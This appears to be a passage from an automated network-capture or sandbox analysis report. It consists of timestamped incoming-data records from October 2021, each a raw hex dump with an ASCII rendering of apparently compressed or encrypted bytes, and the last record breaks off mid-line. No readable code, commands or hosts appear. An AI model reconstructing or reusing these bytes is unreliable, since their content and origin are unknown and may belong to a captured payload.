2021-10-13 07:59:22 UTC	273	IN	Data Raw: 86 28 94 23 d0 0e e7 32 90 20 e7 7c 0d 7a a8 13 5c 80 73 01 0e ec 0c 82 15 86 11 a9 e7 52 f0 6f 31 08 c8 92 df 8f 86 ea 33 1a 42 7b bb 78 b3 eb 43 d0 c8 65 b7 10 9e ca 80 f8 bf 20 56 67 c2 8a 63 2c 10 d7 4b 04 44 c5 0b ee 07 24 68 32 04 7b b1 56 d2 a7 d6 30 4a 00 9d ba 0b e9 07 32 f3 78 a6 2b ac e0 2c 4b c4 57 25 6a 8c e6 38 20 5f 83 2d ac f4 1c f3 15 b8 21 cd 96 d1 d0 95 4d 05 a5 50 c9 d6 67 84 14 f2 95 f5 5e e1 81 06 3e 5e 54 eb c2 aa 98 b1 f4 52 29 a3 06 97 94 a7 55 3f 5c c0 30 37 a5 91 e9 47 83 3d d9 b9 15 a7 60 e0 6e 0f f4 f1 d1 c1 d5 bf 3d 48 2b 00 38 d6 55 57 40 78 50 2c 21 2b 00 c4 1f aa cb 0a d4 66 b1 7b 6c b2 dd e4 48 86 62 05 68 18 41 0a 16 65 00 f6 26 4d f4 15 e8 82 97 b6 54 0c 7e 71 7b 35 40 74 27 14 ca 8b 38 e6 18 29 d0 1f 15 4c 64 54 e8 81 Data Ascii: (#2 \|z\sRo13B{xCe Vgc,KD$h2{V0J2x+,KW%j8 _-!MPg^>^TR)U?\07G=`n=H+8UW@xP,!+f{lHbhAe&MT~q{5@t'8)LdT
2021-10-13 07:59:22 UTC	281	IN	Data Raw: 4f 76 32 e9 5e 72 f6 88 00 00 fb 6e af 1d a9 dd e5 0f 00 9f bd 13 81 7c 4d 66 bb 04 22 ca f9 a3 28 88 db 56 c3 c2 3f 58 57 18 be 5f 05 43 d5 d8 f0 40 06 f8 af 5b eb 16 3f b1 77 a2 2b 26 7a fc f3 4d c8 d5 61 2f 24 b9 20 eb 28 73 47 15 ce 21 55 98 bc 64 e1 e3 5b c2 74 89 38 5a 78 59 70 e6 cc 17 7f eb 04 07 46 b4 9d 61 47 e9 08 dc 6b fe 3e 54 06 25 67 09 38 7c 04 40 79 bc 99 63 1b 98 b7 7c 77 64 c8 c9 75 85 20 be 46 cf 9e 7b 81 60 0e 06 55 a4 e9 2a 62 3e c8 fe 3c 30 cd c4 e7 2b 08 9a 3f b5 7f 2f 7c c4 94 46 eb 60 46 53 60 57 b3 50 52 b8 8c f6 6f 83 f6 61 be db 5e 00 49 24 ef b1 93 b5 40 49 6a 90 42 87 ed 05 71 1d 93 2a 5f e9 8f cd 6a 43 5d 5c 78 e0 2a 60 4c 12 fe 4a 5c 41 19 44 c8 16 9f 35 bf a4 0d 98 df 04 78 2f 9f 71 18 8b 94 1a 6a d3 59 39 42 fc 0e fc a6 Data Ascii: Ov2^rn\|Mf"(V?XW_C@[?w+&zMa/$ (sG!Ud[t8ZxYpFaGk>T%g8\|@yc\|wdu F{`Ub><0+?/\|F`FS`WPRoa^I$@IjBq_jC]\x*`LJ\AD5x/qjY9B
2021-10-13 07:59:22 UTC	289	IN	Data Raw: bb 74 cc 31 98 e8 02 ac 5d 6b b8 5b 82 d6 68 50 a8 75 75 aa 10 bd 5e 4b 85 dd 38 5e 63 58 a2 8a b1 e7 69 90 c3 08 3a 68 e3 e6 3f 81 7f 68 e2 4b 7e e0 18 65 ea 96 ef de 0a 1e 3d 16 f4 3a 87 d8 e7 a4 e7 da 76 3c 9a e4 ba f7 2f f5 39 d8 9c c8 48 ec a9 76 90 c1 b3 70 d6 94 56 7b 6c 1e 34 b6 a8 68 ff 7c 78 9f 6b fe 26 03 c9 b0 a8 93 8a 2e 69 93 f8 da 44 c3 54 41 ea 1a 95 55 c5 ed 0b b5 0e 26 24 2c 4a 09 10 43 09 c4 7a 0a d6 10 d1 a6 b6 89 21 4b ac 9b d2 94 c0 6e c9 2d 0e 43 6b 33 d2 25 b1 7f 0e 6d bd c2 f3 b7 9e 52 50 1e e7 5e bb 62 20 42 ad 64 e1 2d 1c 8d a2 e6 f7 8b 0c 78 ba 91 72 09 06 ae 8c d4 6a 71 d3 4b e2 7e 17 bc 54 99 8f 45 3b 33 a0 f4 30 35 8a e7 4f f6 d1 41 cb 9d c3 ab c7 9a de b7 b2 73 90 0d 74 a2 f7 aa d5 d1 07 85 85 a6 d6 54 8c e1 62 7c 13 c5 c7 Data Ascii: t1]k[hPuu^K8^cXi:h?hK~e=:v</9HvpV{l4h\|xk&.iDTAU&$,JCz!Kn-Ck3%mRP^b Bd-xrjqK~TE;305OAstTb\|
2021-10-13 07:59:22 UTC	297	IN	Data Raw: 15 81 6a 0d 83 81 70 04 d6 59 b1 08 d6 20 81 d0 6d 4c 7c 18 ed c9 81 b2 43 38 f2 46 ea 63 9d 05 ce a4 26 e3 0f 73 ed 87 0b 8f 42 4a 78 9b 09 ca 7a 83 29 c1 ee 34 5d ff 86 f8 6a 23 b2 45 50 7a ae be af e6 69 62 da ec b8 48 a1 71 2d 33 1a 38 f6 f0 9b f7 f0 96 98 b5 9b 65 06 cb 01 5c e3 00 80 62 d1 d0 aa 3d 70 a2 77 e6 de 1f da 08 b6 01 1b 86 19 17 84 5e 78 92 1c b2 9e 99 e7 31 74 55 13 c0 8d e9 49 33 d8 46 be 39 81 2a be 26 79 0b 9b c6 d0 15 41 32 48 18 23 89 5c 0d 68 0e 5e 51 3a 02 0e b4 29 68 20 c5 9e 5c c8 ba b1 32 ce 33 fa 22 8b a1 d3 00 95 31 bb 32 d7 fa 7f ec 03 3a 8d b0 1b 40 0e 6b c3 b5 a2 1f 68 5d b2 2f c9 98 56 c6 38 37 78 9a 14 8d 1d 7b ad b6 c2 1c 02 da 21 2f 9b 97 22 a8 19 cf ef 23 15 7f 5f f1 1d 33 25 e8 f5 3c 43 34 13 49 48 3d e1 89 15 4a 05 Data Ascii: jpY mL\|C8Fc&sBJxz)4]j#EPzibHq-38e\b=pw^x1tUI3F9*&yA2H#\h^Q:)h \23"12:@kh]/V87x{!/"#_3%<C4IH=J
2021-10-13 07:59:22 UTC	305	IN	Data Raw: 48 46 10 84 1f df 4a f7 da d3 1b aa df f1 91 5b 5d 78 4b 7b c5 9e f7 bb 1d 70 ba 96 a4 b4 d4 d2 0b c1 c3 d1 f4 f9 10 52 01 11 14 0e cf c2 8d 97 e1 3e 41 dd 32 f2 53 42 37 84 df 20 b6 1d 77 52 0f e5 4c 97 e6 a0 b3 59 86 64 99 fc 2a b5 38 3f dd 88 7a 25 66 29 b6 62 58 92 30 6f fc 0d ef f1 54 87 8a 49 5e df 28 be be 28 27 ea 57 82 fa e5 24 ad ef 86 76 2e f9 5b b8 26 f8 e5 f4 2f 5f ca e1 1f 9a 95 e2 b6 54 50 2a 04 1e 2f 96 2b 19 03 c6 55 5f 13 85 2a 88 fa 8d 42 19 0c 4b cd f6 cb 0b 54 0b 30 48 ae 82 50 8b e2 2d 5b 61 c0 49 a5 a8 6d 2e a5 8a 99 32 e3 4e f5 40 64 0d 19 63 5a 24 31 8c cb 2c 5e b8 79 cb 1a 02 ed bf 3c 04 f6 03 65 8d ae 99 e2 94 59 a5 be 30 05 69 46 20 29 79 c0 49 93 a7 40 29 af 00 81 4b 4b 6f 47 73 86 1e a9 00 82 64 1e 52 b0 cd f8 6d 52 91 da 29 Data Ascii: HFJ[]xK{pR>A2SB7 wRLYd8?z%f)bX0oTI^(('W$v.[&/_TP/+U_*BKT0HP-[aIm.2N@dcZ$1,^y<eY0iF )yI@)KKoGsdRmR)
2021-10-13 07:59:22 UTC	313	IN	Data Raw: 5b 74 70 3f ae 0a c8 b8 60 b4 4d fb 92 44 40 9a cb 79 d9 98 88 d3 19 56 b6 1d 13 ec af b4 71 70 44 fc 0d 7e bc 5a b1 9b c0 c5 f3 e1 bc 84 18 52 23 5d b3 62 df af 11 2d aa 69 4c b2 7e f9 b0 48 49 49 c5 58 7b d3 d8 b3 7b 90 96 05 ad 57 72 b3 d9 16 11 b3 3d f4 e6 96 a9 3c 42 7e d0 c6 43 f3 bd a6 f0 cc b0 f9 5e f5 6a df 14 6e 72 ad dc 1a ab 05 85 77 7b 90 17 19 64 e2 3e 28 2d 1b 0f 65 be 67 db 8e 4b 5f 42 c3 f1 e2 24 a0 3f 0c 29 52 1e 02 82 01 d3 aa 79 cf 2b a3 89 60 d9 fe 6b 41 79 d4 3b 48 1a 0a fd a7 3f 66 9b ee 25 62 5a d8 32 ca c8 8a ef 01 54 2a 51 6e 4d d3 c9 33 14 6f b8 67 a2 3a c8 da 73 19 dc 9b 9c 1f c6 fe 67 02 58 2d be b6 05 f2 a4 27 af ae 49 a6 96 94 7b 42 ad 65 5d 08 49 69 a9 07 17 0c d0 81 a5 7b 60 92 a9 bb 3d 71 ac 81 74 20 4e 02 46 f6 a3 9e 0a Data Ascii: [tp?`MD@yVqpD~ZR#]b-iL~HIIX{{Wr=<B~C^jnrw{d>(-egK_B$?)Ry+`kAy;H?f%bZ2T*QnM3og:sgX-'I{Be]Ii{`=qt NF
2021-10-13 07:59:22 UTC	320	IN	Data Raw: 84 33 d0 f5 be 26 4c 58 c1 19 7f e1 02 b2 d0 51 43 d2 29 55 8d e7 09 60 6d 51 54 d8 cf ea 41 8a 20 a4 57 86 e3 22 23 06 54 51 95 e1 01 7f 8f 5f 3e b1 d0 d5 da a6 ac 2e 51 59 20 39 7d e2 4d e2 39 0d ac 14 95 68 f4 93 78 9b 5f 72 08 2e 3e 18 72 24 27 f3 cf 8b b0 63 8c c6 f8 95 f9 aa b7 d1 d6 bd 2a 20 83 12 07 9a 80 44 0c 09 21 2b 4d 49 5c 86 32 74 17 7a 4c b9 0f c5 1f de 09 38 5d 42 ed f2 8a 10 d7 4f 8e d6 50 5e ab 01 d4 9b 85 ac ca 19 73 42 b7 65 7a 6b a5 70 0e f4 f3 71 82 e9 8a b3 55 cb 07 ad 2a 72 fc 99 b6 b8 99 45 9c 61 df c0 a0 87 83 83 d0 3a 56 7f ad 2a e4 27 0d 92 be c7 26 5d a4 65 ec 66 91 fc 08 e8 8a 4b 23 65 2c c9 22 de 1a 89 b3 0c f6 c9 83 c5 c0 7d c9 08 a2 69 c2 62 52 3a b5 09 e1 ae 4b 87 a9 6a 0c b7 f9 0d 92 d8 d5 2a 47 58 a3 56 5a d5 c5 d0 5b Data Ascii: 3&LXQC)U`mQTA W"#TQ_>.QY 9}M9hx_r.>r$'c* D!+MI\2tzL8]BOP^sBezkpqUrEa:V'&]efK#e,"}ibR:Kj*GXVZ[
2021-10-13 07:59:22 UTC	328	IN	Data Raw: b8 d2 a0 75 7b 2b 5a 7d 9f 42 d0 c2 31 e4 8c b6 f1 44 19 13 25 f0 71 c7 7e cd 49 b4 3b 40 99 c1 9d a8 4c b9 73 da 4a 8f f8 a1 50 27 51 2f a0 f8 06 ab 98 52 4c 7c 34 94 b9 7f f4 fb de 25 d0 09 00 69 e0 a6 a2 ab 45 24 ca 8a 7a 03 35 0c f4 94 f3 8f b3 37 1b f0 56 2f b8 13 e2 3f 7f ff 4c e8 24 7f b8 3c 31 a6 20 39 7d 66 83 53 16 6a 9d 66 92 3a 7b 0f 28 50 4f 9f 38 9b e9 05 4b 95 c4 fc 07 99 17 d1 77 e5 b5 38 e2 87 2c 6f 33 74 d6 93 21 43 76 c9 de 5b 81 fa 5b 64 d9 0b 61 be f8 9c 07 9b 72 c8 4b 1d 30 0f 8c 07 d6 be 1e 48 65 ba 88 7f 31 1f c2 f1 47 fc f4 9c b9 0c f4 16 11 e0 0d 0a 5f 89 57 a8 63 ee 75 57 36 3c e0 0e 24 8f 79 9b a4 b8 bd 26 77 3e 6a c3 e7 46 c3 f4 0a 4c 64 1e 14 88 17 c6 2d e5 bd 08 29 be 94 e2 60 eb 45 fa d6 ab a7 a1 fb f7 eb 80 55 fe 54 28 b2 Data Ascii: u{+Z}B1D%q~I;@LsJP'Q/RL\|4%iE$z57V/?L$<1 9}fSjf:{(PO8Kw8,o3t!Cv[[darK0He1G_WcuW6<$y&w>jFLd-)`EUT(
2021-10-13 07:59:22 UTC	336	IN	Data Raw: 07 6a 46 de d4 df 18 cc 9d 16 8b 74 db f0 8c da fa 6a 2a b0 00 ce 08 7c a7 5e 93 38 b5 0f 5f 24 d8 f5 c1 4f ba 08 cb 59 56 59 99 4f 20 ee 5b 5b 62 e8 b5 2d fe 2a 1d 03 2e f5 8c ea b8 3c f1 50 00 44 18 3b aa 27 2b 94 4d 6a 90 89 40 98 2d 6c e9 11 33 0e 26 25 b2 84 70 4d e2 d4 db 36 84 6a 26 66 28 e1 be 00 79 e9 31 ad 23 e3 b9 4c f4 95 cf f6 c6 cc 42 73 e0 58 ff 82 92 68 a3 11 90 57 70 d6 0e 5a 70 1f 1d 3e a7 02 f9 a2 e4 f9 e7 ba 91 30 20 f2 40 36 8e b4 48 cf a9 30 c8 4f d2 d9 5d 23 6f d1 ec ee c1 ad b9 17 8d 2d 11 10 11 c7 c5 c4 be ae 53 8a 18 59 4c 5a b5 fd 5d 35 5b 66 a1 16 48 04 27 5c d7 46 4a f9 40 84 f6 ff a8 35 56 19 ca d6 88 be 19 29 51 40 cd f2 0a 05 2a ed 3f 29 02 80 46 e1 d9 45 23 2f f2 de c3 19 07 0b 31 5f 10 a6 36 96 19 f2 36 03 da 4b 9c 2d 7e Data Ascii: jFtj\|^8_$OYVYO [[b-.<PD;'+Mj@-l3&%pM6j&f(y1#LBsXhWpZp>0 @6H0O]#o-SYLZ]5[fH'\FJ@5V)Q@*?)FE#/1_66K-~
2021-10-13 07:59:22 UTC	344	IN	Data Raw: d4 5b 3d 31 c1 68 96 64 69 62 7b 50 31 16 f3 b1 2e 60 d7 42 b4 0f 49 d2 42 f6 ef 7b e7 15 81 f6 57 21 f5 68 ae 59 50 28 b3 00 54 d6 ed 02 48 14 87 6b 92 65 1e e1 90 14 70 a6 94 14 80 dc f9 98 2f 1e aa cc a0 64 9c 4b 7d 3e 61 45 b5 d6 2a f5 ae 4e 82 32 af 23 35 71 b3 ae f9 0a 55 bb fb a3 66 71 e0 e9 26 c4 ec 60 09 ff 93 34 1c 9d ae ff c9 63 f2 c0 49 1c ba 95 c5 09 05 50 7a f0 c5 65 6d 0d b5 fa cc c7 00 08 ee 88 55 3b 13 eb b8 36 fb d4 7e 5c 55 b5 be a0 21 44 66 78 88 8e 96 66 38 87 7d 32 01 69 97 3f ce 99 a6 f5 33 09 3f 12 13 d5 1c 22 5c 48 09 c0 bf af f8 a2 d5 0c b8 78 6b 11 63 05 d2 9b 43 3b 33 fd 0d ef 07 6e 5d a7 91 22 a5 61 09 e5 13 cb 33 fc 93 18 50 28 25 2e ce 93 91 ed 2c b1 78 14 cf a8 5e de 19 0c 81 65 b3 77 94 a5 c1 51 f2 66 4a a2 ba 6d a3 ef ba Data Ascii: [=1hdib{P1.`BIB{W!hYP(THkep/dK}>aE*N2#5qUfq&`4cIPzemU;6~\U!Dfxf8}2i?3?"\HxkcC;3n]"a3P(%.,x^ewQfJm
2021-10-13 07:59:22 UTC	352	IN	Data Raw: 4e 81 2c c2 e0 d1 d0 02 fd d0 29 ef bc 29 c1 a7 03 4c 7b a1 8d e1 c5 61 ca 90 c2 cd e1 1d 77 3d b3 50 9e 45 32 fb 2c 92 37 c5 c4 8a 41 85 a2 f3 a0 08 b7 5f 74 f4 25 7b 32 5d 10 11 0e 2e d9 76 4c 5d 6f 26 0b d5 be d5 95 dc 38 53 4d e5 25 42 dc d5 d7 cd 80 4b 6d 78 b5 c9 a1 0c a6 82 ad 99 5a 03 54 2b bc 25 72 90 62 90 5a c2 a6 36 e2 1b bc b3 af e7 64 5d 1a 31 a5 4d da 81 de b2 44 a4 0d d6 f9 24 97 7b 58 94 21 f0 8e 97 65 c8 46 c3 cc f5 4d e0 5a 6a b1 88 c2 81 46 6f ba b2 85 1d 07 fc 69 b2 a4 94 34 ca 1c d4 60 dd ad 6a 44 8d 25 33 b2 e0 1f 39 c1 b2 09 8f 1e 07 5b ae 6c 1d 71 df 8b 8a 38 3c 4a bd ce 98 20 44 b9 81 08 ee eb 4b 0d a5 58 f9 a7 f0 0a 5d 29 26 08 a1 c1 e1 e8 4a d4 44 b0 6e 1a d4 d3 e4 ab 7e 25 5b 01 ab 95 56 a9 80 f3 02 60 19 ac 65 70 aa 17 dd d7 Data Ascii: N,))L{aw=PE2,7A_t%{2].vL]o&8SM%BKmxZT+%rbZ6d]1MD${X!eFMZjFoi4`jD%39[lq8<J DKX])&JDn~%[V`ep
2021-10-13 07:59:22 UTC	359	IN	Data Raw: 69 a6 e1 cf 79 26 48 ea 68 f1 c5 24 59 4e dd 65 76 53 51 d8 c8 fb 73 61 7c cf 5c 78 67 7c 79 de 25 ae ee b0 fb cc cd 7c 0b ba af 97 19 7e 7f 02 3b 3e 86 a3 bf 78 5c 0f 19 3c 30 42 f0 b5 18 0b 8d 36 12 4d cc 6c e0 e1 d3 de ea 12 64 db 5f 5e 91 69 f5 00 86 54 54 e2 a9 65 ca dc 93 50 c7 8c e7 79 01 76 85 c4 5e 5a ab 86 56 9c 91 8d f2 a1 ff cf 09 07 be 2d c8 8a dd ea 99 4e 65 62 07 4c 40 a9 13 1c ef 29 5f d2 38 f1 de a9 02 89 b0 44 ee c2 42 5c e7 3d 33 c7 14 8f b8 de 16 3f 98 05 ce fe b3 50 24 82 a1 d0 18 c7 6e 12 bf 30 35 9a 15 ec a4 c5 6d 36 e6 9c f9 9d 07 c0 0f 85 73 28 f1 79 12 24 82 44 1e d8 9b a9 d1 1b e9 ef 67 d5 91 89 de 4e 5d 70 e9 15 89 19 17 8b cf fa fe f8 37 d6 21 92 70 0e 4d da 8b 44 02 63 9c 20 91 f3 3a 62 fb 85 aa 2a be c9 de f0 94 50 3d ac 5d Data Ascii: iy&Hh$YNevSQsa\|\xg\|y%\|~;>x\<0B6Mld_^iTTePyv^ZV-NebL@)_8DB\=3?P$n05m6s(y$DgN]p7!pMDc :b*P=]
2021-10-13 07:59:22 UTC	367	IN	Data Raw: a0 c0 99 8d 1c d8 4f b1 57 d6 38 9e 22 8b 59 59 25 13 a2 39 ad 80 2b 3e 7d 4c d6 ea fa d4 33 db e8 c1 dc b3 b3 db e1 9b ac 9a c5 8e 1c 9d d6 c7 4e f8 fc 76 da 1f a0 da b9 e0 d2 e1 99 af 23 a2 5a d3 c2 52 71 e5 ba d3 73 c3 a2 c0 5f 25 b9 76 20 5d 96 5f 59 29 c1 3a 65 61 7f 36 fd a6 b9 6b 7d ed 40 f7 55 34 5a c4 40 16 d3 79 5c f7 fd dc 36 94 a8 13 53 68 30 ae 79 3b 7a 2d cb cb 80 7f 65 e1 f2 a5 98 8a 4a cf d0 1d 9c b6 66 99 a7 4e 74 cc f2 08 0b e2 56 57 03 5f 2c b9 fe 79 73 5a 25 17 bd 5c f7 03 e2 77 1f c7 38 50 41 dc 87 b5 74 7e f2 b3 a2 9f 09 95 94 71 ff ca 77 32 7f e7 d1 e8 eb 71 02 0f 29 64 2a ae ef 5f 2b 75 88 6a f8 56 4a d2 a3 b2 bc f9 97 b9 de 1a 9e a2 c6 4f 4f 36 6f 23 48 a9 be dd b6 0e f6 87 01 6e 4a af 3e b1 6e 6e 4b bb 9d c7 d4 82 b6 85 45 b8 74 Data Ascii: OW8"YY%9+>}L3Nv#ZRqs_%v ]_Y):ea6k}@U4Z@y\6Sh0y;z-eJfNtVW_,ysZ%\w8PAt~qw2q)d*_+ujVJOO6o#HnJ>nnKEt
2021-10-13 07:59:22 UTC	375	IN	Data Raw: 71 5c 63 44 0a 91 15 22 0a f6 40 1a d7 a7 96 92 0d 88 bd 01 4a 66 32 3d e8 57 66 de 40 1b 0f b5 f1 25 b7 81 64 9f f1 58 26 37 98 14 07 bb 31 97 83 ad ca 52 5a dc 02 59 d2 58 9c 1b ef 64 2c 9f 72 f1 9e 08 bb 4b b4 08 aa 79 9a 36 a5 ea 0c 78 cf 48 95 0e 85 b2 5a 4c 48 76 cd 4e 4b 4e ec 74 a1 bf 10 da 3d d0 9a 06 78 47 1c d9 05 ed 66 38 e5 66 df 67 a8 16 e3 d1 52 f4 fe 6b c7 f9 a1 48 3d b4 f0 7d 37 ef 2e 03 2d 32 12 c0 78 29 4a 01 65 4a 80 e9 05 38 c4 74 f4 99 37 cd ba 7f 7e 18 a2 d8 bc 03 41 f9 39 c6 c1 c5 32 7a 88 ab f4 4c fe f5 8f 8f 3e 99 ea ae 59 d0 11 28 f2 55 1b 4d 0b 61 b7 84 0a 6d 55 23 06 56 69 14 81 26 05 a5 10 4d a0 9c 25 03 80 c8 04 82 2a 0c 67 56 a6 77 7b 76 c2 f4 95 a6 7c 20 dd 51 d4 80 cb 73 5d f7 5c 04 b0 e7 dd 29 c0 4c 2d 77 f4 83 5e 25 88 Data Ascii: q\cD"@Jf2=Wf@%dX&71RZYXd,rKy6xHZLHvNKNt=xGf8fgRkH=}7.-2x)JeJ8t7~A92zL>Y(UMamU#Vi&M%*gVw{v\| Qs]\)L-w^%
2021-10-13 07:59:22 UTC	383	IN	Data Raw: 7f ab e2 2a 75 b3 f2 07 8d 55 46 4b a8 2b b3 97 72 11 85 b5 78 db c5 da 57 8b f1 11 42 b3 3b 79 c6 16 15 5e f2 f7 09 b1 93 ce 8f f1 96 43 d9 25 eb c7 4b 18 75 9d 8a fc 59 69 1d a3 61 51 53 84 45 1c 2d ac 17 6b 76 c1 14 c3 13 72 0a 4d 0d ed a4 69 75 9d b6 09 1a 40 6d 01 5e 3a 90 75 01 e5 39 15 02 9c 55 a1 2c dd 8c ae 57 38 91 5b 85 ef 01 98 d1 87 aa a3 51 58 fc 6b ee 16 7a 22 fc ce c0 eb 48 f2 7a 9e cf 6e 06 93 6d 91 35 a5 32 63 32 d9 5f 57 19 4c 7a fe 8a b1 a7 06 61 97 0a 33 0c 8b 74 9a 5e a7 97 2b a1 4c ca 69 17 5d 3b 7d 60 1a a6 07 72 bd bf 4d 41 3d 54 67 04 e1 6a 5a 1c e4 a2 22 4d 96 af cb 25 83 59 f9 ba 8f 2c 0a e5 50 87 69 ae 8c b2 57 9c 4e a5 d3 6c 04 58 6f a8 52 55 f0 19 93 ee 05 ab cf 21 dd 23 3b bc de b0 65 ce 51 25 56 9c 8f 43 b6 c2 7a 4d 1b 42 Data Ascii: *uUFK+rxWB;y^C%KuYiaQSE-kvrMiu@m^:u9U,W8[QXkz"Hznm52c2_WLza3t^+Li];}`rMA=TgjZ"M%Y,PiWNlXoRU!#;eQ%VCzMB
2021-10-13 07:59:22 UTC	391	IN	Data Raw: 46 fc c4 fa 50 9e fc c0 71 60 54 5a 9a b2 0e 03 d3 6e 35 4c cd a8 9c 4a 42 06 93 a7 6b 49 0f 52 9f 1f 16 4a e2 a3 6e ab 0e 59 90 59 46 fd 12 74 10 54 0f 12 ae b6 2d b7 55 90 2d 89 ef 86 01 9c c6 2d 85 ce 26 bb d1 4c e2 03 95 95 54 8b 53 16 82 2d 5f da 01 f6 91 4a 82 bf 10 9c 5c 32 71 a5 e8 09 b6 11 84 78 24 ee 9e 67 a3 56 35 ff 45 e5 b8 73 bc 1f 37 4b b8 61 6d 78 db db 40 71 19 9d 8d 7d 78 9e 2b f3 10 53 cc 1b d9 a0 90 c9 8c 58 9f 65 51 67 d1 06 34 4a 5d 3d 76 94 44 d2 e1 94 4a 22 5d f9 87 23 29 87 a4 41 7c c3 28 99 c1 4f a6 71 71 c8 bd aa d9 63 f3 ae bb 6d e6 9e a2 35 38 9b d7 e3 3e fe 97 23 77 3f 57 e9 44 a6 cc 70 51 d0 c4 48 a5 22 3f 67 1a dd 78 bd 2f b7 79 53 42 0d d6 e5 9a eb 10 ac d4 70 9f 85 a8 37 c5 df a6 52 d7 5f 1b f3 98 94 f8 33 7b 1c 00 6d c8 Data Ascii: FPq`TZn5LJBkIRJnYYFtT-U--&LTS-_J\2qx$gV5Es7Kamx@q}x+SXeQg4J]=vDJ"]#)A\|(Oqqcm58>#w?WDpQH"?gx/ySBp7R_3{m
2021-10-13 07:59:22 UTC	398	IN	Data Raw: 96 0d de 16 71 16 76 b6 4f ff 79 a5 b2 7e 75 51 67 ee 14 8f 49 a3 eb e3 4f 74 09 52 d9 71 d5 7e c3 ea c4 d6 d4 d2 32 47 bc b3 12 02 58 f2 25 3e 39 16 ed b6 4e 9b 18 44 1a 11 d3 a0 31 ba 5a 63 8c b6 be 20 63 28 ae 53 2f df 06 12 d2 33 73 87 29 1c 1c 5f 36 d1 25 64 af 37 19 9f ad 16 29 74 61 44 25 98 3e 8e 91 66 af ef 5c 27 f2 c0 27 3f 16 94 99 ac bf 5e 9b 1c 56 c1 37 69 8c bb 69 ff ab 44 ce 7e 4d 7f fc 02 8b 62 65 bc 1a 6d 79 b7 99 91 30 36 bf e0 5a cb 09 e2 74 2b 5e 79 e5 e1 0b f1 df 78 b2 d1 9a 15 b2 ca 62 e5 b4 55 83 7b 9d e7 4b e4 f8 64 86 23 a2 65 e2 cf 00 d8 9a 7e 8e f3 51 0e c5 ce 5d 50 99 99 d2 af 34 a7 d3 20 06 ae 2e a7 5a d8 14 8c 62 df 64 b4 f0 83 65 8c 30 9b 79 84 5e ef b8 f1 5f 2a 59 ca 08 9c c7 99 24 7e d8 90 8c 07 27 29 c7 39 e9 48 da bf ee Data Ascii: qvOy~uQgIOtRq~2GX%>9ND1Zc c(S/3s)_6%d7)taD%>f\''?^V7iiD~Mbemy06Zt+^yxbU{Kd#e~Q]P4 .Zbde0y^_*Y$~')9H
2021-10-13 07:59:22 UTC	406	IN	Data Raw: 61 8a aa ed 85 5b 17 78 b7 cc 21 ad 70 ea 7d 53 43 b7 cb 1f 6c a5 8e 71 fc f1 61 0e f7 e2 c8 77 9a 4e 0a c9 c2 ab 33 77 73 c0 83 30 3f 81 54 a1 2a 89 e6 7d 40 c2 a4 32 ef 9c 45 93 c3 70 a7 09 27 ea 37 82 30 b1 bc f9 5a 01 9e 20 03 bc 1f b2 bd 38 cd 60 ba dc 8c 79 35 41 84 56 a4 31 0d dc 69 3e 98 13 13 ad 8a c2 c3 70 90 b0 1d 6b 20 20 51 1b 99 66 06 a6 86 78 e4 89 d2 d9 a6 c4 13 70 bc 8e e5 ea 65 c6 27 05 ef b6 7b b5 27 a2 5f ab e4 35 c5 ca 04 c2 af 56 f3 3c 21 62 5d a3 0f ad a4 c6 42 a9 58 42 6e 05 db d2 c9 02 a2 6a 98 ef 00 5f 7a 38 21 67 b7 50 82 48 31 0c 18 d6 9c d2 db 07 32 3e 6c 5d b4 f8 c4 43 9d db 00 b8 30 ec 23 e3 81 89 22 90 2a 24 36 1d 6c 3c 23 51 af eb d5 0a e5 01 2b 5e b9 30 38 89 42 a4 67 c2 61 d5 a2 46 2f 39 f0 15 be 94 da 4d cd 07 5c ec 3d Data Ascii: a[x!p}SClqawN3ws0?T}@2Ep'70Z 8`y5AV1i>pk Qfxpe'{'_5V<!b]BXBnj_z8!gPH12>l]C0#"$6l<#Q+^08BgaF/9M\=
2021-10-13 07:59:22 UTC	414	IN	Data Raw: 87 ff 65 b7 49 2c 3a 03 d7 05 e1 d4 14 10 78 c2 b7 49 bd 97 5f aa 46 e7 2d e4 a5 62 c8 c0 02 18 28 01 8d 7d a5 a8 66 da 65 e0 a4 4f ba ea a3 c3 82 39 73 8b be a3 9d 9c 7f c6 89 83 6f 6b 75 b7 63 de 2e 12 22 37 6a 57 cb 12 87 24 6e 00 29 e9 2f 31 32 68 26 8d 78 14 af b2 b8 34 f5 74 ca 92 c8 07 ca 51 c2 3f e5 f7 6a aa 3d 77 4d a3 7b 13 6d 00 c3 e9 38 15 29 b1 b3 b1 e9 ab 00 6e fd 18 28 a9 b7 a7 64 af 3b 8e 08 8a 0a a2 3b 48 d6 9a 32 f6 5c e2 00 17 78 04 8a 5e 71 b4 3c 4f 24 72 3e e8 67 b0 81 fb 40 09 9a 21 eb 4f ba 42 c2 22 3b 43 24 7d c6 a9 e3 72 e1 68 ad 44 32 0d 34 cb 45 5d 22 d3 a8 e0 2b 7d 11 8a 36 f7 a6 17 f9 60 20 1e b7 45 66 69 15 bb 58 6f 3c b6 a7 05 ee 15 22 87 b7 6a 9e 19 e6 46 f4 b4 8f 22 4b 79 d8 d3 fc ae 66 2b 7c b2 4d 53 6f 9d 2a cb 30 74 5e Data Ascii: eI,:xI_F-b(}feO9sokuc."7jW$n)/12h&x4tQ?j=wM{m8)n(d;;H2\x^q<O$r>g@!OB";C$}rhD24E]"+}6` EfiXo<"jF"Kyf+\|MSo*0t^
2021-10-13 07:59:22 UTC	422	IN	Data Raw: 63 c3 8c 9a e4 f7 69 bd 81 03 03 19 2d c7 91 37 2c 0a 10 97 88 00 9f 3b 56 84 e0 45 b4 06 94 e3 b8 24 d0 66 60 de b9 a5 6a 26 9c db 83 69 28 6f 24 94 ef 84 6e 21 0f 94 11 b3 62 cd de 6b 09 fe 82 07 7a aa ff 1c f0 15 a0 f8 20 7c 28 e0 1e 7f 09 7c 49 0d 02 23 da 66 ea ae 2a 5a d0 6d 9d 85 bc 9c 52 0b 93 0a 26 06 14 94 03 62 75 e5 a7 82 44 d8 41 ae a7 09 50 33 63 9a 62 ff 9d 2a a9 0a da 0f 10 83 56 45 d4 43 fd 92 10 30 8a 2b 7b 54 50 9e 5a fc f9 40 a1 25 79 6e 4b c9 31 9b 15 ca 02 92 76 4d 7a d3 87 a1 22 b0 e0 70 d6 76 65 16 af 3f a0 cb fe 74 87 e3 3f 61 2c c5 8f 43 12 7a 05 a6 79 ab 68 09 4d 73 27 81 69 7f dc 37 cf 76 de f3 33 de 36 31 5b 63 49 0e 1f 7f dd 9f 68 07 76 86 76 b6 f3 cc de c8 a0 47 28 14 3b 03 ce f3 50 a0 90 ab 3b 9e 2b 07 03 57 79 e8 a5 